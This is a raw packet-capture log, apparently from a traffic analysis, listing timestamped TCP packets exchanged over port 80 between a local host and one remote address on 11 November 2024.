                                                                                                                                                Nov 11, 2024 19:16:47.940566063 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.940577984 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.940634966 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.941000938 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941011906 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941024065 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941055059 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.941730022 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941747904 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941760063 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941766977 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.941772938 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941802979 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.942497015 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.942508936 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.942518950 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.942548990 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.942593098 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.943269014 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.943283081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.943295956 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.943332911 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.944039106 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944052935 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944062948 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944075108 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944084883 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.944138050 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.944812059 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944823980 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944835901 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944859028 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.944889069 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.945585012 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.945596933 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.945607901 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.945619106 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.945645094 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.945677042 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.946213007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.946225882 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.946235895 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.946248055 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.946270943 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.946304083 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.947031975 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947046995 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947057962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947071075 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947083950 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947089911 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.947138071 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.947894096 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947906971 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947916985 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947928905 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947938919 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.947969913 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.948704004 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948723078 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948735952 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948749065 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948753119 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.948760986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948779106 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.948801041 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.949510098 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.949522972 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.949532986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.949546099 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.949563980 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.949605942 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.950340986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950352907 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950364113 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950375080 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950387001 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950433969 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.951152086 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.951164961 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.951175928 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.951188087 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.951195955 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.951231956 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.951988935 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952002048 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952013016 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952029943 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952032089 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.952043056 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952069044 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.952124119 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.952783108 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952795029 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952806950 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952817917 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952830076 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952841043 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.952904940 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.953778028 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953790903 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953802109 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953813076 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953813076 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.953824997 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953838110 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953845978 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.953876972 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.954720974 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954735994 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954746008 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954758883 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954771042 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954770088 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.954809904 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.954845905 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.955734968 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955748081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955759048 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955771923 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955784082 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955796003 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955796003 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.955838919 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.955838919 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.956501007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.956547022 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.956559896 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.956571102 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.956587076 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.956619978 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.009620905 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.057112932 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057168961 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057183981 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057230949 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057243109 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057241917 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.057260990 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057354927 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.057354927 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.057703018 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057715893 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057769060 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.057976961 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.057991028 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.058024883 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061269999 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061284065 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061297894 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061309099 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061322927 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061359882 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061359882 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061427116 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061446905 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061459064 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061466932 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061470985 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061485052 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061491966 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061496019 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061507940 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061521053 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061530113 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061533928 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061548948 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061557055 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061558008 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061572075 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061590910 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061592102 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061605930 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061610937 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061619043 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061633110 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.061635017 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.061656952 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.062608004 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.062621117 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.062632084 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.062644005 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.062655926 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.062669039 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.062674046 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.062674046 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.062714100 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.063608885 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.063622952 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.063633919 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.063646078 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.063657045 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.063657999 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.063669920 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.063688993 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.063719034 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.064605951 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.064620972 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.064631939 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.064644098 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.064655066 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.064676046 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.064704895 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.064786911 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.065454960 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.065466881 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.065478086 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.065490961 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.065505981 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.065538883 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.065633059 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.065675974 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.066171885 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.066185951 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.066262007 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.066306114 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.066318035 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.066337109 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.066349030 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.066361904 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.066365957 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.066406012 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.067280054 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.067295074 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.067306042 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.067332029 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.067375898 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.067445993 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.067460060 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.067471981 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.067482948 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.067507029 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.067534924 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.068074942 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.068088055 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.068124056 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.068239927 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.068254948 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.068267107 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.068278074 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.068310022 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.068345070 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.069060087 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.069072962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.069108009 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.069224119 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.069236040 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.069281101 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.069736004 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.069751024 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.069762945 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.069787025 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.070298910 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.070312023 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.070322990 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.070336103 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.070348978 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.070347071 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.070363998 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.070389986 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.071194887 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.071235895 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.071345091 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.071357012 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.071367979 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.071378946 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.071399927 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.071429014 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.072202921 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072216988 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072227955 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072240114 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072247028 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.072283983 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.072323084 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072335958 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072374105 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.072454929 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072468996 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072479010 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072491884 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072504997 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.072504997 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.072540045 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.073425055 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.073438883 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.073450089 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.073462963 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.073476076 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.073487997 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.073496103 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.073496103 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.073538065 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.074425936 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.074439049 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.074449062 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.074456930 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.074462891 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.074465990 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.074505091 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.075345039 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075357914 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075370073 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075381994 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075388908 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.075395107 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075407028 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075436115 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.075467110 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.076216936 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076230049 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076241016 CET804973192.114.2.230192.168.2.4
